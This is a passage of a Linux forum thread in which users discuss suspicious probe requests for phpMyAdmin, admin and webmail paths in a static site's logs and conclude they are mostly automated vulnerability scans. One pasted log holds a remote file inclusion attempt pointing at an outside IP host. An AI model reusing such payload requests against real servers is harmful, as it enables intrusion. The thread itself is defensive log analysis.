Find the answer to your Linux question:
Page 2 of 2 FirstFirst 1 2
Results 11 to 18 of 18
If it only happens occasionally, then it is likely someone has input the wrong IP address, or host.domain name in their browser or web-enabled application....
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #11
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,452

    If it only happens occasionally, then it is likely someone has input the wrong IP address, or host.domain name in their browser or web-enabled application.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  2. #12
    Linux Guru Lakshmipathi's Avatar
    Join Date
    Sep 2006
    Location
    3rd rock from sun - Often seen near moon
    Posts
    1,757

    Exclamation

    Hi -
    My stat shows only last 25 ipaddresses ...so it's difficult to detect the origin of attack..

    here is few other strange access to my site


    cgi-sys/India
    /path/index.php
    /ocp-103/index.php
    /(null)
    //polynews//
    //modules/Forums/admin/admin_users.php
    /suskun.htm
    /phpmyadmin/index.php
    phpmyadmin/z9v8index.php
    /ccTiddly/index.php
    //init.php
    //CMD.TXT
    /backend/fm-releases-global.xml
    /cpanelf
    /cpenal
    /_vti_bin/owssvr.dll
    /MSOffice/cltreq.asp
    I don't have any php file or asp ..site is just a pure html site.

    Does this suggest some one really tried to hack my site?
    First they ignore you,Then they laugh at you,Then they fight with you,Then you win. - M.K.Gandhi
    -----
    FOSS India Award winning ext3fs Undelete tool www.giis.co.in. Online Linux Terminal http://www.webminal.org

  3. #13
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,452
    As suggested previously I4ever, this is probably the results of some sort of web crawler. Add the robots.txt entries to your system. It may not eliminate them, but it will reduce their occurances. In any case, I don't see anything that would be too suspicious in these attempted accesses. A web site is kind of like an open house in that anyone can go there, and they can look into any room that isn't locked. Sometimes when I am on a site and I am looking for something in particular, I will either try to access the directory it is in, or I will try to access the file I am looking for directly. This is not intended to try and hack their systems, but doubtless their logs show something very similar to what you are seeing.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  4. #14
    Linux Engineer Freston's Avatar
    Join Date
    Mar 2007
    Location
    The Netherlands
    Posts
    1,049
    I get these all the time, whether apache is running or not...

    ...my thought is that these are random (or rather systematic) scripted probes for known vulnerabilities. I think everyone gets them, and perhaps that non-assigned (empty or off-line) IP's also get them.

    You are just one in a long list of IP's who get targeted, and I wouldn't worry to much about it.


    Here's (part of) mine, without source IP's:
    Code:
     - [03/May/2009:14:22:48 +0200] "GET /roundcube/index.php HTTP/1.1" 404 485
     - [03/May/2009:14:22:48 +0200] "GET /webmail/index.php HTTP/1.1" 404 485
     - [03/May/2009:14:22:48 +0200] "GET /index.php HTTP/1.1" 404 485
     - [03/May/2009:14:22:48 +0200] "GET /mail/index.php HTTP/1.1" 404 485
     - [08/May/2009:21:48:07 +0200] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:07 +0200] "GET /admin/phpMyAdmin/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:07 +0200] "GET /admin/sysadmin/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:07 +0200] "GET /admin/sqladmin/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:08 +0200] "GET /admin/db/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:08 +0200] "GET /admin/web/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:08 +0200] "GET /admin/pMA/main.php HTTP/1.0" 404 485
     - [09/May/2009:08:13:06 +0200] "GET /wordtrans/index.html HTTP/1.1" 404 485
     - [09/May/2009:08:13:06 +0200] "GET /wordtrans/index.php HTTP/1.1" 404 485
     - [09/May/2009:09:44:47 +0200] "GET //README HTTP/1.1" 404 485
     - [09/May/2009:09:44:47 +0200] "GET /horde//README HTTP/1.1" 404 485
     - [09/May/2009:09:44:48 +0200] "GET /horde2//README HTTP/1.1" 404 485
     - [09/May/2009:09:44:48 +0200] "GET /horde3//README HTTP/1.1" 404 485
     - [09/May/2009:09:44:48 +0200] "GET /horde-3.0.9//README HTTP/1.1" 404 485
     - [09/May/2009:09:44:48 +0200] "GET /Horde//README HTTP/1.1" 404 485
     - [10/May/2009:02:23:04 +0200] "GET /README.txt HTTP/1.1" 404 485
     - [10/May/2009:02:23:04 +0200] "GET /moodle/README.txt HTTP/1.1" 404 485
     - [10/May/2009:10:50:03 +0200] "GET //user/templates/footer.tpl HTTP/1.1" 404 485
     - [11/May/2009:00:52:49 +0200] "GET //user/templates/footer.tpl HTTP/1.1" 404 485
     - [11/May/2009:02:46:29 +0200] "GET /appserv/main.php?appserv_root=http://217.73.17.133/pristupy/penati/usage_220801.html?& HTTP/1.1" 404 485
     - [11/May/2009:07:15:51 +0200] "GET /typo3conf/index.html HTTP/1.1" 404 485
     - [11/May/2009:07:19:16 +0200] "GET /appserv/main.php?appserv_root=http://217.73.17.133/pristupy/penati/usage_220801.html?& HTTP/1.1" 404 485
     - [11/May/2009:09:47:05 +0200] "GET //user/templates/footer.tpl HTTP/1.1" 404 485
     - [13/May/2009:19:19:42 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 485
     - [14/May/2009:15:05:22 +0200] "GET /wordtrans/index.html HTTP/1.1" 404 485
     - [14/May/2009:15:05:22 +0200] "GET /wordtrans/index.php HTTP/1.1" 404 485
     - [15/May/2009:11:11:06 +0200] "GET /wordtrans/index.html HTTP/1.1" 404 485
     - [15/May/2009:11:11:06 +0200] "GET /wordtrans/index.php HTTP/1.1" 404 485
     - [16/May/2009:18:19:03 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 485
     - [18/May/2009:10:12:30 +0200] "GET http://www.cavanmuseum.ie/images/Cursing-Stones.jpg HTTP/1.1" 404 485
     - [18/May/2009:10:27:04 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 485
    As you see, all of them are 404, and have nothing to do with whatever it is I am running.
    Can't tell an OS by it's GUI

  5. #15
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,452
    Quote Originally Posted by Lakshmipathi View Post
    Hi -
    My stat shows only last 25 ipaddresses ...so it's difficult to detect the origin of attack..

    here is few other strange access to my site ...

    I don't have any php file or asp ..site is just a pure html site.

    Does this suggest some one really tried to hack my site?
    It's possible. Do check your html for modifications that you haven't made. If someone did hack into your site, it could have added malicious code to your web pages. Ie, they might not be quite so "vanilla" any longer!
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  6. #16
    Linux Guru Lakshmipathi's Avatar
    Join Date
    Sep 2006
    Location
    3rd rock from sun - Often seen near moon
    Posts
    1,757

    Exclamation

    I didn't verified my html codes,I'll check the html for any clues about this....

    I got a clear feeling somebody tried to play with my site,entries like this

    //modules/Forums/admin/admin_users.php
    /phpmyadmin/index.php
    clearly shows some one is tried to gain admin access or backend database
    First they ignore you,Then they laugh at you,Then they fight with you,Then you win. - M.K.Gandhi
    -----
    FOSS India Award winning ext3fs Undelete tool www.giis.co.in. Online Linux Terminal http://www.webminal.org

  7. #17
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,452
    First they criticize you,Then they laugh at you,Then they fight with you,Then you win. - M.K.Gandhi
    First they laugh at you, then they laugh some more, then they roll on the floor laughing, then they all die laughing. - The Three Stooges

    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  8. #18
    Linux Engineer b2bwild's Avatar
    Join Date
    Jul 2008
    Location
    Behind You!
    Posts
    1,108
    Well, that doesnt implement today's date.

    Its something more like this.

    First they criticize you,Then they laugh at you, Then they fight with you, Then you turn GodMode on X_X
    Never make any misteaks.

    Read my Blog at --> Penguin Inside Subscribe Feed

Page 2 of 2 FirstFirst 1 2

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •